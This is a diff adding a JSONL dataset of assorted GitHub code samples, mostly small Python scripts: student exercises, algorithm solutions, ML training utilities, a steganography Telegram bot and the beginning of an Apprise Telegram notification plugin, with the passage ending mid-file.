diff --git "a/2437.jsonl" "b/2437.jsonl" new file mode 100644--- /dev/null +++ "b/2437.jsonl" @@ -0,0 +1,1687 @@ +{"seq_id":"5836839369","text":"import ast\nfrom statistics import mode\n\nimport pandas as pd\n\n# w tym pliku chcemy uzupelnic brakujace w dfce keywordy na podstawie podzialu na klastry i/lub slow kluczowych w klastrach\n\nf=open(\"lista_klastrow.csv\", \"r+\")\n\nfor line in f.readlines():\n clusters = (list(ast.literal_eval(line)))\n\n\ndf = pd.read_csv('preprocessed_2023.csv')\ndf = df.head(len(clusters))\n\nn_clusters = max(clusters)+1\n\nprint(n_clusters)\nprint(len(df))\n\ni=0\ndf['cluster'] = pd.Series(clusters)\n\nprint(df['cluster'])\n\n\n\nprint(n_clusters)\nkeywords_clusters = [[] for _ in range(n_clusters)]\nprint(keywords_clusters)\n\nfor i in range(301):\n tmp_clus = df.loc[i, 'cluster']\n tmp_keywords = list(ast.literal_eval(df.loc[i, 'keywords']))\n for keyword in tmp_keywords:\n keywords_clusters[tmp_clus].append(keyword)\n\n #(keywords_clusters[tmp_clus]).extend(tmp_keywords)\n\n#print(keywords_clusters)\n\nfrom collections import Counter\n\ndef most_common_elements(lst, n):\n # Use Counter to count the occurrences of each element\n counts = Counter(lst)\n\n # Get the n most common elements and their counts\n common_elements = [element for element, _ in counts.most_common(n)]\n\n return common_elements\n\nto_fill = []\nfor i in range(n_clusters):\n to_fill.append(most_common_elements(keywords_clusters[i], 3))\n\nprint(to_fill)\n\ndf = pd.read_csv('preprocessed_2023.csv')\ndf = df.head(len(clusters))\ndf['cluster'] = pd.Series(clusters)\n\n\ndef new_column(row):\n return to_fill[(row['cluster'])]\n\n# Apply the function to each row and create a new column 'new_column'\ndf['cluster_keywords'] = df.apply(new_column, axis=1)\n\n\nprint(df['cluster_keywords'])\n\ndf.to_csv('301_processed_with_clustering.csv')\n","repo_name":"CCzarek/hack4law","sub_path":"manage_keywords.py","file_name":"manage_keywords.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41180918902","text":"# Кривко Сергей ИУ7-14Б\n# Ввести трёхмерный массив, вывести из него i-й срез (матрицу - фрагмент трёхмерного массива) по второму индексу\n\n# Ввод трехмерного массива\nwhile True:\n x_size = int(input('Введите размер массива по x: '))\n if x_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\nwhile True:\n y_size = int(input('Введите размер массива по y: '))\n if y_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\nwhile True:\n z_size = int(input('Введите размер массива по z: '))\n if z_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\na = []\nfor i in range(x_size):\n a.append([])\n for j in range(y_size):\n a[i].append([])\n for k in range(z_size):\n a[i][j].append(int(input('Введите элемент [{0}][{1}][{2}]: '.format(i + 1, j + 1, k + 1))))\n# Ввод номера среза\nwhile True:\n index = int(input('Введите номер среза: ')) - 1\n if 0 <= index < y_size:\n break\n print('Номер среза должен быть натуральным числом от 1 до {0}'.format(y_size))\n\n# Вывод среза\nprint()\nfor i in range(x_size):\n for j in range(z_size):\n print(' {0:5} '.format(a[i][index][j]), end='')\n print()\nprint()\n","repo_name":"SergeiKrivko/Labs","sub_path":"labs/Архив/lab9-7.py","file_name":"lab9-7.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"71013388412","text":"# Problem: https://leetcode.com/problems/find-all-duplicates-in-an-array/description/\nclass Solution(object):\n def findDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n for i in xrange(len(nums)):\n if nums[abs(nums[i])-1] > 0:\n nums[abs(nums[i])-1] = -nums[abs(nums[i])-1]\n else:\n res.append(abs(nums[i]))\n return res\n","repo_name":"divyanshk/algorithms-and-data-structures","sub_path":"DuplicatesArray.py","file_name":"DuplicatesArray.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74484975292","text":"#-----INPUT/DADOS---------------------------------------\nx = [1,2,3,4,5,6,7,8,9,10]\ny = [1,2,3,6,7,8,11,12,13,67]\n\n# união de x e y, sem mostrar valores iguais\n\n# criar vetor para a uniao\nuniao = [0]*20\n\nfor i in range(10):\n uniao[i] = x[i]\n# pre = [1,2,3,4,5,6,7,8,9,10,0,0,0,0,0,0,0,0,0,0]\n\n#marcador para proximo indice livre\nproxlivre = 10\n\n#encontrar elementos de Y diferentes dos de X, ou diferentes dos de UNIAO, se houverem repeticoes dentro de Y.\n\n\nfor i in range(10): #indexador Y\n \n #Flag indicando que nao achei um numero igual\n achei = False\n \n for j in range(10): #indexador X\n \n if y[i] == uniao[j]:\n achei = True\n break\n \n # se cheguei aqui com achei==false, para esse y[i], nao ha elemento igual em X, e devo adiciona-lo em UNIAO.\n \n #if not achei:\n if achei == False:\n uniao[proxlivre] = y[i]\n proxlivre+=1\n\nprint (uniao)\n\n# Alternativa:\n#uniao=list(set(x + y))","repo_name":"gabireghelin/exercicios","sub_path":"uniao.py","file_name":"uniao.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27982883071","text":"import collections.abc\nimport os\nimport random\nfrom collections import defaultdict\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom mlagents_envs.base_env import ActionTuple\n# from PythonAcademy.models.dqn import DQN, dqn_loss\nfrom mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel\n\nfrom PythonAcademy.src.curriculum import Curriculum\nfrom PythonAcademy.src.wrappers import TensorActionTuple\n\n\ndef set_random_seed(environment, seed):\n\tenvironment.seed(seed)\n\tnp.random.seed(seed)\n\ttorch.manual_seed(seed)\n\trandom.seed(seed)\n\n\n# def load_model(model_type, path_weights, environment, memory_size=20, model_kwargs={}):\n# \tmodel = model_type(environment.observation_space.shape,\n# \t environment.action_space.n,\n# \t memory_size=memory_size,\n# \t **model_kwargs)\n# \tm = DQN(\n# \t\tlist(range(environment.action_space.n)),\n# \t\tmodel,\n# \t\toptimizer=\"sgd\",\n# \t\tloss_function=dqn_loss,\n# \t)\n# \tm.load_weights(path_weights)\n# \treturn m\n\n\ndef show_rewards(R: Iterable, **kwargs):\n\tplt.plot(R)\n\tplt.yticks(np.arange(max(np.min(R), -200), np.max(R) + 1, 50))\n\tplt.grid()\n\ttitle = kwargs.get(\"title\", \"Reward per episodes\")\n\tplt.title(title)\n\tplt.ylabel(\"Reward [-]\")\n\tplt.xlabel(\"Episodes [-]\")\n\n\tsubfolder = kwargs.get(\"subfolder\", False)\n\tif subfolder:\n\t\tos.makedirs(f\"figures/{subfolder}/\", exist_ok=True)\n\t\tplt.savefig(f\"figures/{subfolder}/Projet_{title.replace(' ', '_').replace(':', '_')}.png\", dpi=300)\n\telse:\n\t\tos.makedirs(\"RNN/figures/\", 
exist_ok=True)\n\t\tplt.savefig(f\"figures/Projet_{title.replace(' ', '_').replace(':', '_')}.png\", dpi=300)\n\tplt.show(block=kwargs.get(\"block\", True))\n\n\ndef batchwise_temporal_filter(x: torch.Tensor, decay: float = 0.9):\n\t\"\"\"\n\t:param x: (batch_size, time_steps, ...)\n\t:param decay:\n\t:return:\n\t\"\"\"\n\tbatch_size, time_steps, *_ = x.shape\n\tassert time_steps >= 1\n\n\tpowers = torch.arange(time_steps, dtype=torch.float32, device=x.device).flip(0)\n\tweighs = torch.pow(decay, powers)\n\n\tx = torch.mul(x, weighs.unsqueeze(0).unsqueeze(-1))\n\tx = torch.sum(x, dim=1)\n\treturn x\n\n\ndef mapping_update_recursively(d, u):\n\t\"\"\"\n\tfrom https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth\n\t:param d: mapping item that wil be updated\n\t:param u: mapping item updater\n\t:return: updated mapping recursively\n\t\"\"\"\n\tfor k, v in u.items():\n\t\tif isinstance(v, collections.abc.Mapping):\n\t\t\td[k] = mapping_update_recursively(d.get(k, {}), v)\n\t\telse:\n\t\t\td[k] = v\n\treturn d\n\n\nclass TrainingHistory:\n\tdef __init__(self, container: Dict[str, List[float]] = None):\n\t\tself.container = defaultdict(list)\n\t\tif container is not None:\n\t\t\tself.container.update(container)\n\n\tdef __getitem__(self, item):\n\t\treturn self.container[item]\n\n\tdef __setitem__(self, key, value):\n\t\tself.container[key] = value\n\n\tdef __contains__(self, item):\n\t\treturn item in self.container\n\n\tdef __iter__(self):\n\t\treturn iter(self.container)\n\n\tdef __len__(self):\n\t\treturn len(self.container)\n\n\tdef items(self):\n\t\treturn self.container.items()\n\n\tdef concat(self, other):\n\t\tfor key, values in other.items():\n\t\t\tif isinstance(values, list):\n\t\t\t\tself.container[key].extend(values)\n\t\t\telse:\n\t\t\t\tself.container[key].append(values)\n\n\tdef append(self, key, value):\n\t\tself.container[key].append(value)\n\n\tdef min(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\treturn min(self[key])\n\t\treturn np.inf\n\n\tdef min_item(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\targmin = np.argmin(self[key])\n\t\t\treturn {k: v[argmin] for k, v in self.items()}\n\t\traise ValueError(\"key not in container\")\n\n\tdef max(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\treturn max(self[key])\n\t\treturn -np.inf\n\n\tdef max_item(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\targmax = np.argmax(self[key])\n\t\t\treturn {k: v[argmax] for k, v in self.items()}\n\t\traise ValueError(\"key not in container\")\n\n\t@staticmethod\n\tdef _set_default_plot_kwargs(kwargs: dict):\n\t\tkwargs.setdefault('fontsize', 16)\n\t\tkwargs.setdefault('linewidth', 3)\n\t\tkwargs.setdefault('figsize', (16, 12))\n\t\tkwargs.setdefault('dpi', 300)\n\t\treturn kwargs\n\n\tdef plot(\n\t\t\tself,\n\t\t\tsave_path=None,\n\t\t\tshow=False,\n\t\t\t**kwargs\n\t):\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tloss_metrics = [k for k in self.container if 'loss' in k.lower()]\n\t\tother_metrics = [k for k in self.container if k not in loss_metrics]\n\t\tn_cols = int(np.sqrt(1 + len(other_metrics)))\n\t\tn_rows = int((1 + len(other_metrics)) / n_cols)\n\t\tfig, axes = plt.subplots(nrows=n_rows, ncols=n_cols, figsize=kwargs[\"figsize\"], sharex='all')\n\t\taxes = np.ravel(axes)\n\t\tfor i, 
ax in enumerate(axes):\n\t\t\tif i == 0:\n\t\t\t\tfor k in loss_metrics:\n\t\t\t\t\tax.plot(self[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\tax.set_ylabel(\"Loss [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\telse:\n\t\t\t\tk = other_metrics[i - 1]\n\t\t\t\tax.plot(self[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\tif save_path is not None:\n\t\t\tplt.savefig(save_path, dpi=kwargs[\"dpi\"])\n\t\tif show:\n\t\t\tplt.show()\n\t\tplt.close(fig)\n\n\nclass TrainingHistoriesMap:\n\tREPORT_KEY = \"report\"\n\n\tdef __init__(self, curriculum: Optional[Curriculum] = None):\n\t\tself.curriculum = curriculum\n\t\tself.histories = defaultdict(TrainingHistory, **{TrainingHistoriesMap.REPORT_KEY: TrainingHistory()})\n\n\t@property\n\tdef report_history(self) -> TrainingHistory:\n\t\treturn self.histories[TrainingHistoriesMap.REPORT_KEY]\n\n\tdef max(self, key=None):\n\t\tif self.curriculum is None:\n\t\t\treturn self.histories[TrainingHistoriesMap.REPORT_KEY].max(key)\n\t\telse:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].max(key)\n\n\tdef concat(self, other):\n\t\tself.histories[TrainingHistoriesMap.REPORT_KEY].concat(other)\n\t\tif self.curriculum is not None:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].concat(other)\n\n\tdef append(self, key, value):\n\t\tself.histories[TrainingHistoriesMap.REPORT_KEY].append(key, value)\n\t\tif self.curriculum is not None:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].append(key, value)\n\n\t@staticmethod\n\tdef _set_default_plot_kwargs(kwargs: dict):\n\t\tkwargs.setdefault('fontsize', 16)\n\t\tkwargs.setdefault('linewidth', 3)\n\t\tkwargs.setdefault('figsize', (16, 12))\n\t\tkwargs.setdefault('dpi', 300)\n\t\treturn kwargs\n\n\tdef plot(self, save_path=None, show=False, lesson_idx: Optional[Union[int, str]] = None, **kwargs):\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tif self.curriculum is None:\n\t\t\tassert lesson_idx is None, \"lesson_idx must be None if curriculum is None\"\n\t\t\treturn self.plot_history(TrainingHistoriesMap.REPORT_KEY, save_path, show, **kwargs)\n\t\tif lesson_idx is None:\n\t\t\tself.plot_history(TrainingHistoriesMap.REPORT_KEY, save_path, show, **kwargs)\n\t\telse:\n\t\t\tself.plot_history(self.curriculum[lesson_idx].name, save_path, show, **kwargs)\n\n\tdef plot_history(\n\t\t\tself,\n\t\t\thistory_name: str,\n\t\t\tsave_path=None,\n\t\t\tshow=False,\n\t\t\t**kwargs\n\t):\n\t\tos.makedirs(os.path.dirname(save_path), exist_ok=True)\n\t\thistory = self.histories[history_name]\n\t\tif self.curriculum is not None and history_name != TrainingHistoriesMap.REPORT_KEY:\n\t\t\tlessons = [self.curriculum[history_name]]\n\t\t\tlessons_start_itr = [0]\n\t\telif self.curriculum is not None and history_name == TrainingHistoriesMap.REPORT_KEY:\n\t\t\tlessons = self.curriculum.lessons\n\t\t\tlessons_lengths = {k: [len(self.histories[lesson.name][k]) for lesson in lessons] for k in history.container}\n\t\t\tlessons_start_itr = {k: np.cumsum(lessons_lengths[k]) for k in history.container}\n\t\telse:\n\t\t\tlessons = []\n\t\t\tlessons_start_itr = []\n\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tloss_metrics = [k for k in history.container if 'loss' in k.lower()]\n\t\trewards_metrics = [k for k in history.container 
if 'reward' in k.lower()]\n\t\tother_metrics = [k for k in history.container if k not in loss_metrics and k not in rewards_metrics]\n\t\tn_metrics = 2 + len(other_metrics)\n\t\tn_cols = int(np.sqrt(n_metrics))\n\t\tn_rows = int(n_metrics / n_cols)\n\t\tfig, axes = plt.subplots(nrows=n_rows, ncols=n_cols, figsize=kwargs[\"figsize\"], sharex='all')\n\t\tif axes.ndim == 1:\n\t\t\taxes = np.expand_dims(axes, axis=-1)\n\t\tfor row_i in range(n_rows):\n\t\t\tfor col_i in range(n_cols):\n\t\t\t\tax = axes[row_i, col_i]\n\t\t\t\travel_index = row_i * n_cols + col_i\n\t\t\t\tif ravel_index == 0:\n\t\t\t\t\tfor k in loss_metrics:\n\t\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\tax.set_ylabel(\"Loss [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\telif ravel_index == 1:\n\t\t\t\t\tfor k in rewards_metrics:\n\t\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\t\tfor lesson_idx, lesson in enumerate(lessons):\n\t\t\t\t\t\t\tif lesson.completion_criteria.measure == k:\n\t\t\t\t\t\t\t\tax.plot(\n\t\t\t\t\t\t\t\t\tlesson.completion_criteria.threshold*np.ones(len(history[k])), 'k--',\n\t\t\t\t\t\t\t\t\tlabel=f\"{k} threshold\", linewidth=kwargs['linewidth']\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tif history_name == TrainingHistoriesMap.REPORT_KEY and lesson.is_completed:\n\t\t\t\t\t\t\t\tax.axvline(\n\t\t\t\t\t\t\t\t\tlessons_start_itr[k][lesson_idx], ymin=np.min(history[k]), ymax=np.max(history[k]),\n\t\t\t\t\t\t\t\t\tcolor='r', linestyle='--', linewidth=kwargs['linewidth'], label=f\"lesson start\"\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\tax.set_ylabel(\"Rewards [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\telse:\n\t\t\t\t\tk = other_metrics[ravel_index - 1]\n\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\tif row_i == n_rows - 1:\n\t\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tlegend_without_duplicate_labels_(ax)\n\t\tif save_path is not None:\n\t\t\tplt.savefig(save_path, dpi=kwargs[\"dpi\"])\n\t\tif show:\n\t\t\tplt.show()\n\t\tplt.close(fig)\n\n\ndef to_tensor(x, dtype=torch.float32):\n\tif isinstance(x, np.ndarray):\n\t\treturn torch.from_numpy(x).type(dtype)\n\telif not isinstance(x, torch.Tensor):\n\t\treturn torch.tensor(x, dtype=dtype)\n\treturn x.type(dtype)\n\n\ndef linear_decay(init_value, min_value, decay_value, current_itr):\n\treturn max(init_value * decay_value ** current_itr, min_value)\n\n\ndef send_parameter_to_channel(\n\t\tchannel: EnvironmentParametersChannel,\n\t\tparameters: Dict[str, Any]\n) -> Dict[str, float]:\n\t\"\"\"\n\tConvert a dictionary of parameters to a dictionary of floats and send it to the channel.\n\t:param channel: The channel to send the parameters to.\n\t:param parameters: The parameters to send. 
Each value should be able to be converted to a float.\n\t:return: The parameters as floats.\n\t\"\"\"\n\tfloat_params = {k: float(v) for k, v in parameters.items()}\n\tfor key, value in float_params.items():\n\t\tchannel.set_float_parameter(key, value)\n\treturn float_params\n\n\ndef threshold_image(image: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:\n\tif isinstance(image, np.ndarray):\n\t\treturn np.where(image > 0.5, 1.0, 0.0).astype(image.dtype)\n\telif isinstance(image, torch.Tensor):\n\t\treturn torch.where(image > 0.5, torch.ones_like(image), torch.zeros_like(image)).type(image.dtype)\n\telse:\n\t\traise ValueError(\"image must be a numpy array or a torch tensor\")\n\n\ndef unbatch_actions(\n\t\tactions: Union[ActionTuple, TensorActionTuple]\n) -> List[Union[ActionTuple, TensorActionTuple]]:\n\t\"\"\"\n\t:param actions: shape: (batch_size, ...)\n\t:return:\n\t\"\"\"\n\tdtype = type(actions)\n\tactions_list = []\n\tcontinuous, discrete = actions.continuous, actions.discrete\n\tbatch_size = actions.continuous.shape[0] if continuous is not None else discrete.shape[0]\n\tassert batch_size is not None\n\tfor i in range(batch_size):\n\t\tactions_list.append(\n\t\t\tdtype(\n\t\t\t\tcontinuous[i] if continuous is not None else None,\n\t\t\t\tdiscrete[i] if discrete is not None else None)\n\t\t)\n\treturn actions_list\n\n\ndef discount_rewards(r, gamma=0.99, value_next=0.0):\n\t\"\"\"\n\tComputes discounted sum of future rewards for use in updating value estimate.\n\t:param r: List of rewards.\n\t:param gamma: Discount factor.\n\t:param value_next: T+1 value estimate for returns calculation.\n\t:return: discounted sum of future rewards as list.\n\t\"\"\"\n\tdiscounted_r = np.zeros_like(r)\n\trunning_add = value_next\n\tfor t in reversed(range(0, r.size)):\n\t\trunning_add = running_add * gamma + r[t]\n\t\tdiscounted_r[t] = running_add\n\treturn discounted_r\n\n\ndef compute_advantage(rewards, value_estimates, value_next=0.0, gamma=0.99, lambd=0.95):\n\t\"\"\"\n\tComputes generalized advantage estimate for use in updating policy.\n\t:param rewards: list of rewards for time-steps t to T.\n\t:param value_next: Value estimate for time-step T+1.\n\t:param value_estimates: list of value estimates for time-steps t to T.\n\t:param gamma: Discount factor.\n\t:param lambd: GAE weighing factor.\n\t:return: list of advantage estimates for time-steps t to T.\n\t\"\"\"\n\tvalue_estimates = np.append(value_estimates, value_next)\n\tdelta_t = rewards + gamma * value_estimates[1:] - value_estimates[:-1]\n\tadvantage = discount_rewards(r=delta_t, gamma=gamma * lambd)\n\treturn advantage\n\n\ndef legend_without_duplicate_labels_(ax: plt.Axes):\n\thandles, labels = ax.get_legend_handles_labels()\n\tunique = [(h, l) for i, (h, l) in enumerate(zip(handles, labels)) if l not in labels[:i]]\n\tax.legend(*zip(*unique))\n\n","repo_name":"JeremieGince/MAVControlWithSNN","sub_path":"PythonAcademy/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"6057093812","text":"\"\"\"\nBasic classes for modeling Typed Feature Structures.\n\nThis module defines the TypedFeatureStructure class, which models an\nattribute value matrix (AVM) with a type. 
It allows one to access\nfeatures through TDL-style dot notation, or through regular dictionary\naccess.\n\"\"\"\n\nclass TypedFeatureStructure(object):\n\n __slots__ = ['_type', '_avm']\n\n def __init__(self, type, featvals=None):\n self._type = type\n self._avm = {}\n if isinstance(featvals, dict):\n featvals = featvals.items()\n for feat, val in list(featvals or []):\n self[feat] = val\n\n @classmethod\n def default(cls): return cls(None)\n\n def __repr__(self):\n return ''.format(\n self.type, id(self)\n )\n\n def __setitem__(self, key, val):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n if len(subkeys) == 1:\n self._avm[subkey] = val\n else:\n if subkey in self._avm:\n subdef = self._avm[subkey]\n else:\n subdef = self._avm[subkey] = self.default()\n subdef[subkeys[1]] = val\n\n def __getitem__(self, key):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n val = self._avm[subkey]\n if len(subkeys) == 2:\n val = val[subkeys[1]]\n return val\n\n def __contains__(self, key):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n if subkey in self._avm:\n if len(subkeys) == 2:\n return subkeys[1] in self._avm[subkey]\n else:\n return True\n return False\n\n @property\n def type(self):\n return self._type\n @type.setter\n def type(self, value):\n self._type = value\n\n def get(self, key, default=None):\n try:\n val = self[key]\n except KeyError:\n val = default\n return val\n\n def _is_notable(self):\n \"\"\"\n Notability determines if the TFS should be listed as the value\n of a feature or if the feature should just \"pass through\" its\n avm to get the next value. A notable TypedFeatureStructure is\n one with more than one sub-feature.\n \"\"\"\n return len(self._avm) != 1\n\n def features(self):\n fs = []\n for feat, val in self._avm.items():\n try:\n if val._is_notable():\n fs.append((feat, val))\n else:\n for subfeat, subval in val.features():\n fs.append(('{}.{}'.format(feat, subfeat), subval))\n except AttributeError:\n fs.append((feat, val))\n return fs\n","repo_name":"draplater/hrg-parser","sub_path":"delphin/tfs.py","file_name":"tfs.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"18595504055","text":"from fractions import Fraction\nfrom itertools import tee\n\nfrom gon.base import Point\n\n\ndef pairwise(iterable):\n \"\"\"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\"\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\ndef find_vertical_countersegment_end(*,\n domain_end: Point,\n countersegment_start: Point,\n area: Fraction) -> Point:\n dx = countersegment_start.x - domain_end.x\n signed_lower_area = dx * (domain_end.y - countersegment_start.y) / 2\n countersegment_end_y = (area - signed_lower_area) * 2 / dx + domain_end.y\n return Point(countersegment_start.x, countersegment_end_y)\n","repo_name":"GeorgySk/pdan","sub_path":"tests/pdan_tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30629259340","text":"import random\nimport urllib.request\n\n\ndef downloadWebImage(url):\n name = random.randrange(1,1000)\n fullname = str(name) +\".jpg\" #str convert number to string value\n urllib.request.urlretrieve(url, 
fullname)\n\n\ndownloadWebImage(\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSLuQZO9YQzSN1RKGd2Zw80QqByf4mPdQMwwYwh7tPxo9RL6A7G\")","repo_name":"SMGuellord/PythonTut","sub_path":"modules/downloadImageFromWeb.py","file_name":"downloadImageFromWeb.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7260688711","text":"def Fibonacci(v):\n table = [1, 1] + [0] * (v-2)\n\n for i in range(2, len(table)):\n table[i] = table[i - 1] + table[i - 2]\n\n return table[-1]\n\n\nif __name__ == '__main__':\n print(Fibonacci(9))","repo_name":"demyank88/datastructureAlgorithm","sub_path":"dynamicprogramming/Fibonacci/tabulation.py","file_name":"tabulation.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23131570219","text":"from aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.builtin import CommandStart\n\nfrom bot.utils.keyboards import main_menu_keyboard\nfrom bot.utils.misc import reset_user_data\nfrom bot.utils.states import cryption_states_names\n\n\nasync def cmd_start(message: types.Message, state: FSMContext):\n \"\"\"Resets the current user data and sends a welcome message - serves as an entry point for the bot user.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"Steganography is the art and science of invisible communication. \"\n \"It is achieved by hiding the message information in some other carrier media.\\n\\n\"\n \"Image steganography is a subset of steganography where messages are hidden in image files. \"\n \"The original image, before any message is hidden in it, is referred to as the cover image. \"\n \"After hiding the message in it, it is referred to as the stego image. \"\n \"For human eye, these two images must be identical (in appearance at least).\",\n reply_markup=main_menu_keyboard\n )\n await message.answer(\n \"This bot provides image steganography tools to hide secret text messages, \"\n \"both for encryption and decryption. 
\"\n \"Additionally, this implementation also enhance the security of the steganography through data encryption.\\n\\n\"\n \"The source code of the bot is available to everyone to contribute to and reuse, \"\n \"as defined by the open license used for the project:\\n\"\n \"https://github.com/tyranus-project/steganography-telegram-bot\",\n disable_web_page_preview=True\n )\n await message.answer(\n \"Just use the menu buttons or commands and follow the instructions in the messages:\\n\"\n \"/encrypt to start encryption process\\n\"\n \"/decrypt to start decryption process\"\n )\n\n\nasync def cmd_main_menu(message: types.Message, state: FSMContext):\n \"\"\"Resets the current user data and switches the user to the main menu.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"Main menu\",\n reply_markup=main_menu_keyboard\n )\n\n\nasync def cancel_action(message: types.Message, state: FSMContext):\n \"\"\"Interrupts the encryption/decryption processes by resetting the user data, switches the user to the main menu.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"The current action has been cancelled.\",\n reply_markup=main_menu_keyboard\n )\n\n\ndef register_common_handlers(dp: Dispatcher):\n \"\"\"Sets the common handlers.\"\"\"\n dp.register_message_handler(cmd_start, CommandStart(), state=\"*\")\n dp.register_message_handler(cmd_main_menu, commands=[\"menu\"], state=\"*\")\n dp.register_message_handler(cancel_action, Text(equals=\"Cancel\", ignore_case=True), state=cryption_states_names)\n","repo_name":"tyranus-project/steganography-telegram-bot","sub_path":"bot/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39591981634","text":"import requests\nimport re\n\nfrom json import loads\nfrom json import dumps\n\nfrom .NotifyBase import NotifyBase\nfrom ..common import NotifyType\nfrom ..common import NotifyImageSize\nfrom ..common import NotifyFormat\nfrom ..utils import parse_bool\nfrom ..utils import parse_list\nfrom ..AppriseLocale import gettext_lazy as _\n\nTELEGRAM_IMAGE_XY = NotifyImageSize.XY_256\n\n# Token required as part of the API request\n# allow the word 'bot' infront\nVALIDATE_BOT_TOKEN = re.compile(\n r'^(bot)?(?P[0-9]+:[a-z0-9_-]+)/*$',\n re.IGNORECASE,\n)\n\n# Chat ID is required\n# If the Chat ID is positive, then it's addressed to a single person\n# If the Chat ID is negative, then it's targeting a group\nIS_CHAT_ID_RE = re.compile(\n r'^(@*(?P-?[0-9]{1,32})|(?P[a-z_-][a-z0-9_-]+))$',\n re.IGNORECASE,\n)\n\n\nclass NotifyTelegram(NotifyBase):\n \"\"\"\n A wrapper for Telegram Notifications\n \"\"\"\n # The default descriptive name associated with the Notification\n service_name = 'Telegram'\n\n # The services URL\n service_url = 'https://telegram.org/'\n\n # The default secure protocol\n secure_protocol = 'tgram'\n\n # A URL that takes you to the setup/help of the specific protocol\n setup_url = 'https://github.com/caronc/apprise/wiki/Notify_telegram'\n\n # Telegram uses the http protocol with JSON requests\n notify_url = 'https://api.telegram.org/bot'\n\n # Allows the user to specify the NotifyImageSize object\n image_size = NotifyImageSize.XY_256\n\n # The maximum allowable characters allowed in the body per message\n body_maxlen = 4096\n\n # Define object templates\n templates = (\n '{schema}://{bot_token}',\n '{schema}://{bot_token}/{targets}',\n )\n\n # Define our template 
